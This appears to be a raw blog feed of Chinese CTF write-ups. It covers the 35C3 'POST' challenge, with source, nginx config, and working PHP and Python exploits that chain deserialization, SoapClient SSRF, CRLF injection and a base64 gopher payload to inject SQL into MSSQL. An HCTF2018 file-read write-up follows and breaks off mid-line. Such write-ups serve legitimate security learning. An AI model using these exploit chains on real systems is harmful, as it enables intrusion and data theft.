class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Attachment</span> </span>{</span><br><span class="line"> <span class="keyword">private</span> $url = <span class="keyword">NULL</span>;</span><br><span class="line"> <span class="keyword">private</span> $za = <span class="keyword">NULL</span>;</span><br><span class="line"> <span class="keyword">private</span> $mime = <span class="keyword">NULL</span>;</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">($url)</span> </span>{</span><br><span class="line"> <span class="keyword">$this</span>->url = $url;</span><br><span class="line"> <span class="keyword">$this</span>->mime = (<span class="keyword">new</span> finfo)->file(<span class="string">"../"</span>.$url);</span><br><span class="line"> <span class="keyword">if</span> (substr(<span class="keyword">$this</span>->mime, <span class="number">0</span>, <span class="number">11</span>) == <span class="string">"Zip archive"</span>) {</span><br><span class="line"> <span class="keyword">$this</span>->mime = <span class="string">"Zip archive"</span>;</span><br><span class="line"> <span class="keyword">$this</span>->za = <span class="keyword">new</span> ZipArchive;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span><span class="params">()</span> </span>{</span><br><span class="line"> $str = <span class="string">"<a href='{$this->url}'>"</span>.basename(<span class="keyword">$this</span>->url).<span class="string">"</a> ($this->mime "</span>;</span><br><span class="line"> <span class="keyword">if</span> (!is_null(<span class="keyword">$this</span>->za)) {</span><br><span class="line"> <span class="keyword">$this</span>->za->open(<span class="string">"../"</span>.<span class="keyword">$this</span>->url);</span><br><span class="line"> $str .= <span class="string">"with "</span>.<span class="keyword">$this</span>->za->numFiles . <span class="string">" Files."</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> $str. <span class="string">")"</span>;</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line">}</span><br><span class="line"> </span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Post</span> </span>{</span><br><span class="line"> <span class="keyword">private</span> $title = <span class="keyword">NULL</span>;</span><br><span class="line"> <span class="keyword">private</span> $content = <span class="keyword">NULL</span>;</span><br><span class="line"> <span class="keyword">private</span> $attachment = <span class="keyword">NULL</span>;</span><br><span class="line"> <span class="keyword">private</span> $ref = <span class="keyword">NULL</span>;</span><br><span class="line"> <span class="keyword">private</span> $id = <span class="keyword">NULL</span>;</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">($title, $content, $attachments=<span class="string">""</span>)</span> </span>{</span><br><span class="line"> <span class="keyword">$this</span>->title = $title;</span><br><span class="line"> <span class="keyword">$this</span>->content = $content;</span><br><span class="line"> <span class="keyword">$this</span>->attachment = $attachments;</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">save</span><span class="params">()</span> </span>{</span><br><span class="line"> <span class="keyword">global</span> $USER;</span><br><span class="line"> <span class="keyword">if</span> (is_null(<span class="keyword">$this</span>->id)) {</span><br><span class="line"> DB::insert(<span class="string">"INSERT INTO posts (userid, title, content, attachment) VALUES (?,?,?,?)"</span>, </span><br><span class="line"> <span class="keyword">array</span>($USER->uid, <span class="keyword">$this</span>->title, <span class="keyword">$this</span>->content, <span class="keyword">$this</span>->attachment));</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> DB::query(<span class="string">"UPDATE posts SET title = ?, content = ?, attachment = ? WHERE userid = ? AND id = ?"</span>,</span><br><span class="line"> <span class="keyword">array</span>(<span class="keyword">$this</span>->title, <span class="keyword">$this</span>->content, <span class="keyword">$this</span>->attachment, $USER->uid, <span class="keyword">$this</span>->id));</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">public</span> <span class="keyword">static</span> <span class="function"><span class="keyword">function</span> <span class="title">truncate</span><span class="params">()</span> </span>{</span><br><span class="line"> <span class="keyword">global</span> $USER;</span><br><span class="line"> DB::query(<span class="string">"DELETE FROM posts WHERE userid = ?"</span>, <span class="keyword">array</span>($USER->uid));</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">public</span> <span class="keyword">static</span> <span class="function"><span class="keyword">function</span> <span class="title">load</span><span class="params">($id)</span> </span>{</span><br><span class="line"> <span class="keyword">global</span> $USER;</span><br><span class="line"> $res = DB::query(<span class="string">"SELECT * FROM posts WHERE userid = ? AND id = ?"</span>,</span><br><span class="line"> <span class="keyword">array</span>($USER->uid, $id));</span><br><span class="line"> <span class="keyword">if</span> (!$res) <span class="keyword">die</span>(<span class="string">"db error"</span>);</span><br><span class="line"> $res = $res[<span class="number">0</span>];</span><br><span class="line"> $post = <span class="keyword">new</span> Post($res[<span class="string">"title"</span>], $res[<span class="string">"content"</span>], $res[<span class="string">"attachment"</span>]);</span><br><span class="line"> $post->id = $id;</span><br><span class="line"> <span class="keyword">return</span> $post;</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">public</span> <span class="keyword">static</span> <span class="function"><span class="keyword">function</span> <span class="title">loadall</span><span class="params">()</span> </span>{</span><br><span class="line"> <span class="keyword">global</span> $USER;</span><br><span class="line"> $result = <span class="keyword">array</span>();</span><br><span class="line"> $posts = DB::query(<span class="string">"SELECT id FROM posts WHERE userid = ? ORDER BY id DESC"</span>, <span class="keyword">array</span>($USER->uid)) ;</span><br><span class="line"> <span class="keyword">if</span> (!$posts) <span class="keyword">return</span> $result;</span><br><span class="line"> <span class="keyword">foreach</span> ($posts <span class="keyword">as</span> $p) {</span><br><span class="line"> $result[] = Post::load($p[<span class="string">"id"</span>]);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> $result;</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span><span class="params">()</span> </span>{</span><br><span class="line"> $str = <span class="string">"<h2>{$this->title}</h2>"</span>;</span><br><span class="line"> $str .= <span class="keyword">$this</span>->content;</span><br><span class="line"> $str .= <span class="string">"<hr>Attachments:<br><il>"</span>;</span><br><span class="line"> <span class="keyword">foreach</span> (<span class="keyword">$this</span>->attachment <span class="keyword">as</span> $attach) {</span><br><span class="line"> $str .= <span class="string">"<li>$attach</li>"</span>;</span><br><span class="line"> }</span><br><span class="line"> $str .= <span class="string">"</il>"</span>;</span><br><span class="line"> <span class="keyword">return</span> $str;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>可以发现<code>DB</code>类的<code>query</code>方法把接收<code>sql</code>语句后把执行结果丢给了<code>retrieve_values</code>方法,而该方法存在一处反序列化操作,且要求反序列化字符串开头为<code>$serializedobject$</code></p><p>在 mssql 中,<strong>MSSQL会自动将全角unicode字符转换为ASCII表示形式</strong>,$s℮rializedobject$ 入库后会变成 $serializedobject$ ,注意前者的℮不是 ASCII 的 e,整个字符串的 16 进制如下,可见前者的℮的 hex 是 E284AE,而后者 e 的 ASCII 是 0x65</p><p>根据post.php,可以通过SoapClient<code>通过SSRF打MSSQL,前提是要能够触发它的</code><strong>call<code>方法。类</code>Attachment<code>的</code></strong>tostring<code>方法中有一个</code>$this->za->open<code>操作,我们将</code>SoapClient<code>序列化为</code>$za<code>,然后触发其</code>__tostring`方法即可SSRF。</p><p>而<code>default.php</code>中实例化了<code>Post</code>类,把<code>$_POST["title"], $_POST["content"], $attachments</code>传了进去,并调用了<code>save</code>方法</p><p>然后又调用<code>loadall()</code>方法执行数据库查询操作,此时会将返回值开头为<code>$serializedobject$</code>的字符串进行反序列化操作并将返回的值打印触发<code>Post</code>类的<code>__toString</code>方法,而返回值含有反序列化对象,因此又可以触发反序列化对象的<code>__toString</code>方法,从而可以SSRF。</p><p>exp:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Attachment</span> </span>{</span><br><span class="line"> <span class="keyword">private</span> $za = <span class="keyword">NULL</span>;</span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">()</span> </span>{</span><br><span class="line"> <span class="keyword">$this</span>->za = <span class="keyword">new</span> SoapClient(<span class="keyword">null</span>,<span class="keyword">array</span>(<span class="string">'location'</span>=><span class="string">'your_ip'</span>,<span class="string">'uri'</span>=><span class="string">'your_ip'</span>)); </span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line">$c=<span class="keyword">new</span> Attachment();</span><br><span class="line">$aaa=serialize($c);</span><br><span class="line"><span class="keyword">echo</span> $aaa;</span><br></pre></td></tr></table></figure><p>由Nginx配置文件可知,miniProxy代理监听在本地的<code>8080</code>端口,且只接收Get请求,而<code>SoapClient</code>发送的是POST请求。</p><p>得知<code>SoapClientl</code>的<code>_user_agent</code>属性存在CRLF注入,我们可以通过<code>\r\n</code>再注入一个GET请求。<br>另外<code>miniProxy</code>只能代理 <code>http / https</code>请求,可以通过<code>gopher:///</code>绕过,因为miniProxy仅在设置<code>host</code>时验证<code>http / https</code>。或者可以重定向到一个<code>gopher请求</code>来绕过。</p><p>gopher会在请求后加上一个<code>\r\n</code> ,因此构造gopher请求时要在sql语句后加一个注释符<code>-- -</code>, 通过插入<code>DEBUG</code>头我们可以获取到我们的<code>UID</code></p><p>exp:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"> </span><br><span class="line">host=<span class="string">"http://50.3.232.201:8000/?"</span></span><br><span class="line">post={</span><br><span class="line"> <span class="string">"username"</span>:<span class="string">"123456"</span>,</span><br><span class="line"> <span class="string">"password"</span>:<span class="string">"123456"</span>,</span><br><span class="line">}</span><br><span class="line"> </span><br><span class="line">r=requests.Session()</span><br><span class="line">url1=host+<span class="string">"page=login"</span></span><br><span class="line">r.post(url=url1,data=post)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">fetch_uid</span><span class="params">()</span>:</span></span><br><span class="line"> <span class="keyword">return</span> r.get(host, headers={<span class="string">"Debug"</span>: <span class="string">"1"</span>}).content.decode().split(<span class="string">"int("</span>)[<span class="number">1</span>].split(<span class="string">")"</span>)[<span class="number">0</span>]</span><br><span class="line">payload=base64.b64decode(<span class="string">"JHNlcmlhbGl6ZWRvYmplY3TvvIRPOjEwOiJBdHRhY2htZW50IjoxOntzOjI6InphIjtPOjEwOiJTb2FwQ2xpZW50IjozOntzOjM6InVyaSI7czozNToiaHR0cDovL2xvY2FsaG9zdDo4MDgwL21pbmlQcm94eS5waHAiO3M6ODoibG9jYXRpb24iO3M6MzU6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9taW5pUHJveHkucGhwIjtzOjExOiJfdXNlcl9hZ2VudCI7czoxMzk5OiJBQUFBQUhhaGEKCkdFVCAvbWluaVByb3h5LnBocD9nb3BoZXI6Ly8vZGI6MTQzMy9BJTEyJTAxJTAwJTJGJTAwJTAwJTAxJTAwJTAwJTAwJTFBJTAwJTA2JTAxJTAwJTIwJTAwJTAxJTAyJTAwJTIxJTAwJTAxJTAzJTAwJTIyJTAwJTA0JTA0JTAwJTI2JTAwJTAxJUZGJTAwJTAwJTAwJTAxJTAwJTAxJTAyJTAwJTAwJTAwJTAwJTAwJTAwJTEwJTAxJTAwJURFJTAwJTAwJTAxJTAwJUQ2JTAwJTAwJTAwJTA0JTAwJTAwdCUwMCUxMCUwMCUwMCUwMCUwMCUwMCUwMFQwJTAwJTAwJTAwJTAwJTAwJTAwJUUwJTAwJTAwJTA4JUM0JUZGJUZGJUZGJTA5JTA0JTAwJTAwJTVFJTAwJTA3JTAwbCUwMCUwQSUwMCU4MCUwMCUwOCUwMCU5MCUwMCUwQSUwMCVBNCUwMCUwOSUwMCVCNiUwMCUwMCUwMCVCNiUwMCUwNyUwMCVDNCUwMCUwMCUwMCVDNCUwMCUwOSUwMCUwMSUwMiUwMyUwNCUwNSUwNiVENiUwMCUwMCUwMCVENiUwMCUwMCUwMCVENiUwMCUwMCUwMCUwMCUwMCUwMCUwMGElMDB3JTAwZSUwMHMlMDBvJTAwbSUwMGUlMDBjJTAwaCUwMGElMDBsJTAwbCUwMGUlMDBuJTAwZyUwMGUlMDByJTAwJUMxJUE1UyVBNVMlQTUlODMlQTUlQjMlQTUlODIlQTUlQjYlQTUlQjclQTVuJTAwbyUwMGQlMDBlJTAwLSUwMG0lMDBzJTAwcyUwMHElMDBsJTAwbCUwMG8lMDBjJTAwYSUwMGwlMDBoJTAwbyUwMHMlMDB0JTAwVCUwMGUlMDBkJTAwaSUwMG8lMDB1JTAwcyUwMGMlMDBoJTAwYSUwMGwlMDBsJTAwZSUwMG4lMDBnJTAwZSUwMCUwMSUwMSUwMSUwRSUwMCUwMCUwMSUwMCUxNiUwMCUwMCUwMCUxMiUwMCUwMCUwMCUwMiUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMSUwMCUwMCUwMGklMDBuJTAwcyUwMGUlMDByJTAwdCUwMCUyMCUwMGklMDBuJTAwdCUwMG8lMDAlMjAlMDBwJTAwbyUwMHMlMDB0JTAwcyUwMCUyMCUwMCUyOCUwMHUlMDBzJTAwZSUwMHIlMDBpJTAwZCUwMCUyQyUwMCUyMCUwMHQlMDBpJTAwdCUwMGwlMDBlJTAwJTJDJTAwJTIwJTAwYyUwMG8lMDBuJTAwdCUwMGUlMDBuJTAwdCUwMCUyQyUwMCUyMCUwMGElMDB0JTAwdCUwMGElMDBjJTAwaCUwMG0lMDBlJTAwbiUwMHQlMDAlMjklMDAlMjAlMDB2JTAwYSUwMGwlMDB1JTAwZSUwMHMlMDAlMjAlMDAlMjglMDAyJTAwMCUwMDAlMDAlMkMlMDAlMjAlMDAlMjIlMDB0JTAwZSUwMHMlMDB0JTAwJTIyJTAwJTJDJTAwJTIwJTAwJTI4JTAwcyUwMGUlMDBsJTAwZSUwMGMlMDB0JTAwJTIwJTAwZiUwMGwlMDBhJTAwZyUwMCUyMCUwMGYlMDByJTAwbyUwMG0lMDAlMjAlMDBmJTAwbCUwMGElMDBnJTAwLiUwMGYlMDBsJTAwYSUwMGclMDAlMjklMDAlMkMlMDAlMjAlMDAlMjIlMDB0JTAwZSUwMHMlMDB0JTAwJTIyJTAwJTI5JTAwJTNCJTAwJTNCJTAwLSUwMC0lMDAlMjAlMDAtJTAwIEhUVFAvMS4xCkhvc3Q6IGxvY2FsaG9zdAoKIjt9fQ=="</span>)</span><br><span class="line">print(payload)</span><br><span class="line">data={</span><br><span class="line"> <span class="string">"title"</span>:<span class="string">"123456"</span>,</span><br><span class="line"> <span class="string">"content"</span>:payload,</span><br><span class="line">}</span><br><span class="line">url2=host+<span class="string">"action=create"</span></span><br><span class="line">r.post(url=url2,data=data)</span><br></pre></td></tr></table></figure>]]></content>
<summary type="html">
<h1 id="35C3-POST"><a href="#35C3-POST" class="headerlink" title="35C3-POST"></a>35C3-POST</h1><p>扫描目录得到uploads目录,测试目录穿越成功,得到nginx备份文件和源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">server &#123;</span><br><span class="line"> listen 80;</span><br><span class="line"> access_log /var/log/nginx/example.log;</span><br><span class="line"></span><br><span class="line"> server_name localhost;</span><br><span class="line"></span><br><span class="line"> root /var/www/html;</span><br><span class="line"></span><br><span class="line"> location /uploads &#123;</span><br><span class="line"> autoindex on;</span><br><span class="line"> alias /var/www/uploads/;</span><br><span class="line"> &#125;</span><br><span class="line"></span><br><span class="line"> location / &#123;</span><br><span class="line"> alias /var/www/html/;</span><br><span class="line"> index index.php;</span><br><span class="line"></span><br><span class="line"> location ~ \.php$ &#123;</span><br><span class="line"> include snippets/fastcgi-php.conf;</span><br><span class="line"> fastcgi_pass unix:/run/php/php7.2-fpm.sock;</span><br><span class="line"> &#125;</span><br><span class="line"> &#125;</span><br><span class="line"></span><br><span class="line"> location /inc/ &#123;</span><br><span class="line"> deny all;</span><br><span class="line"> &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">server &#123;</span><br><span class="line"> listen 127.0.0.1:8080;</span><br><span class="line"> access_log /var/log/nginx/proxy.log;</span><br><span class="line"></span><br><span class="line"> if ( $request_method !~ ^(GET)$ ) &#123;</span><br><span class="line"> return 405;</span><br><span class="line"> &#125;</span><br><span class="line"> root /var/www/miniProxy;</span><br><span class="line"> location / &#123;</span><br><span class="line"> index index.php;</span><br><span class="line"></span><br><span class="line"> location ~ \.php$ &#123;</span><br><span class="line"> include snippets/fastcgi-php.conf;</span><br><span class="line"> fastcgi_pass unix:/run/php/php7.2-fpm.sock;</span><br><span class="line"> &#125;</span><br><span class="line"> &#125;</span><br><span class="line"> </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
</summary>
</entry>
<entry>
<title>HCTF2018-hideandseek</title>
<link href="http://fdrag0n.github.io/2018/12/19/HCTF2018-hideandseek/"/>
<id>http://fdrag0n.github.io/2018/12/19/HCTF2018-hideandseek/</id>
<published>2018-12-19T02:47:49.000Z</published>
<updated>2019-12-05T13:19:58.702Z</updated>
<content type="html"><![CDATA[<h1 id="hide-and-seek"><a href="#hide-and-seek" class="headerlink" title="hide and seek"></a>hide and seek</h1><p>经过注册登陆后发现有上传点,发现只能上传zip文件,然后发现zip中压缩的文件内容会被解压后输出在页面上,上传php马失败</p><p>尝试读取linux下的环境变量:/proc/self/environ</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">UWSGI_ORIGINAL_PROC_NAME=/usr/local/bin/uwsgiSUPERVISOR_GROUP_NAME=uwsgiHOSTNAME=c52b2c48ec0bSHLVL=0PYTHON_PIP_VERSION=18.1HOME=/rootGPG_KEY=0D96DF4D4110E5C43FBFB17F2D347EA6AA65421DUWSGI_INI=/app/it_is_hard_t0_guess_the_path_but_y0u_find_it_5f9s5b5s9.iniNGINX_MAX_UPLOAD=0UWSGI_PROCESSES=16STATIC_URL=/staticUWSGI_CHEAPER=2NGINX_VERSION=1.15.8-1~stretchPATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binNJS_VERSION=1.15.8.0.2.7-1~stretchLANG=C.UTF-8SUPERVISOR_ENABLED=1PYTHON_VERSION=3.6.8NGINX_WORKER_PROCESSES=autoSUPERVISOR_SERVER_URL=unix:///var/run/supervisor.sockSUPERVISOR_PROCESS_NAME=uwsgiLISTEN_PORT=80STATIC_INDEX=0PWD=/app/hard_t0_guess_n9f5a95b5ku9fgSTATIC_PATH=/app/staticPYTHONPATH=/appUWSGI_RELOADS=0</span><br></pre></td></tr></table></figure><p>找到 /app/it_is_hard_t0_guess_the_path_but_y0u_find_it_5f9s5b5s9.ini文件</p><p>读取这个文件<br><a id="more"></a></p><p>得到:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[uwsgi] module = hard_t0_guess_n9f5a95b5ku9fg.hard_t0_guess_also_df45v48ytj9_main callable=app</span><br></pre></td></tr></table></figure><p>再读/app/hard_t0_guess_n9f5a95b5ku9fg/hard_t0_guess_also_df45v48ytj9_main.py</p><p>得到</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask,session,render_template,redirect, url_for, escape, request,Response</span><br><span class="line"><span class="keyword">import</span> uuid</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> random</span><br><span class="line"><span class="keyword">import</span> flag</span><br><span class="line"><span class="keyword">from</span> werkzeug.utils <span class="keyword">import</span> secure_filename</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line">random.seed(uuid.getnode())</span><br><span class="line">app = Flask(__name__)</span><br><span class="line">app.config[<span class="string">'SECRET_KEY'</span>] = str(random.random()*<span class="number">100</span>)</span><br><span class="line">app.config[<span class="string">'UPLOAD_FOLDER'</span>] = <span class="string">'./uploads'</span></span><br><span class="line">app.config[<span class="string">'MAX_CONTENT_LENGTH'</span>] = <span class="number">100</span> * <span class="number">1024</span></span><br><span class="line">ALLOWED_EXTENSIONS = set([<span class="string">'zip'</span>])</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">allowed_file</span><span class="params">(filename)</span>:</span></span><br><span class="line"> <span class="keyword">return</span> <span class="string">'.'</span> <span class="keyword">in</span> filename <span class="keyword">and</span> \</span><br><span class="line"> filename.rsplit(<span class="string">'.'</span>, <span class="number">1</span>)[<span class="number">1</span>].lower() <span class="keyword">in</span> ALLOWED_EXTENSIONS</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route('/', methods=['GET'])</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">index</span><span class="params">()</span>:</span></span><br><span class="line"> error = request.args.get(<span class="string">'error'</span>, <span class="string">''</span>)</span><br><span class="line"> <span class="keyword">if</span>(error == <span class="string">'1'</span>):</span><br><span class="line"> session.pop(<span class="string">'username'</span>, <span class="keyword">None</span>)</span><br><span class="line"> <span class="keyword">return</span> render_template(<span class="string">'index.html'</span>, forbidden=<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> <span class="string">'username'</span> <span class="keyword">in</span> session:</span><br><span class="line"> <span class="keyword">return</span> render_template(<span class="string">'index.html'</span>, user=session[<span class="string">'username'</span>], flag=flag.flag)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> render_template(<span class="string">'index.html'</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route('/login', methods=['POST'])</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">login</span><span class="params">()</span>:</span></span><br><span class="line"> username=request.form[<span class="string">'username'</span>]</span><br><span class="line"> password=request.form[<span class="string">'password'</span>]</span><br><span class="line"> <span class="keyword">if</span> request.method == <span class="string">'POST'</span> <span class="keyword">and</span> username != <span class="string">''</span> <span class="keyword">and</span> password != <span class="string">''</span>:</span><br><span class="line"> <span class="keyword">if</span>(username == <span class="string">'admin'</span>):</span><br><span class="line"> <span class="keyword">return</span> redirect(url_for(<span class="string">'index'</span>,error=<span class="number">1</span>))</span><br><span class="line"> session[<span class="string">'username'</span>] = username</span><br><span class="line"> <span class="keyword">return</span> redirect(url_for(<span class="string">'index'</span>))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route('/logout', methods=['GET'])</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">logout</span><span class="params">()</span>:</span></span><br><span class="line"> session.pop(<span class="string">'username'</span>, <span class="keyword">None</span>)</span><br><span class="line"> <span class="keyword">return</span> redirect(url_for(<span class="string">'index'</span>))</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route('/upload', methods=['POST'])</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">upload_file</span><span class="params">()</span>:</span></span><br><span class="line"> <span class="keyword">if</span> <span class="string">'the_file'</span> <span class="keyword">not</span> <span class="keyword">in</span> request.files:</span><br><span class="line"> <span class="keyword">return</span> redirect(url_for(<span class="string">'index'</span>))</span><br><span class="line"> file = request.files[<span class="string">'the_file'</span>]</span><br><span class="line"> <span class="keyword">if</span> file.filename == <span class="string">''</span>:</span><br><span class="line"> <span class="keyword">return</span> redirect(url_for(<span class="string">'index'</span>))</span><br><span class="line"> <span class="keyword">if</span> file <span class="keyword">and</span> allowed_file(file.filename):</span><br><span class="line"> filename = secure_filename(file.filename)</span><br><span class="line"> file_save_path = os.path.join(app.config[<span class="string">'UPLOAD_FOLDER'</span>], filename)</span><br><span class="line"> <span class="keyword">if</span>(os.path.exists(file_save_path)):</span><br><span class="line"> <span 